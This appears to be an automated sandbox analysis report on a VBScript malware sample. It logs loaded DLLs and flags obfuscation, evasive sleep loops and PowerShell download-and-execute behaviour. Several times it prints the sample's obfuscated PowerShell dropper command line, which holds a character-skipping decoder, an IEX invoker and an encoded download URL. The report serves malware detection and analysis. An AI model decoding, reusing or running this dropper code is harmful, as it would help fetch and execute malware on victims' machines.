Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: m.Core.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4CFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb@c source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4CCD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\System.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4CFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4D29000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *n.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4D29000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbN source: powershell.exe, 0000000B.00000002.2594834506.000002A2DD294000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000B.00000002.2570430275.000002A2C3142000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegr", "0")
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydss
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydss Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Potential evasive VBS script found (sleep loop)
Source: Initial file Initial file: Do While Langtidsplanen.Status = 0 WScript.Sleep 100
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4922 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4996 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 0000000B.00000002.2594834506.000002A2DD272000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW'
Source: powershell.exe, 0000000B.00000002.2594834506.000002A2DD272000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_7344.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7344, type: MEMORYSTR
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping aszzzw_6777.6777.6777.677e Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr 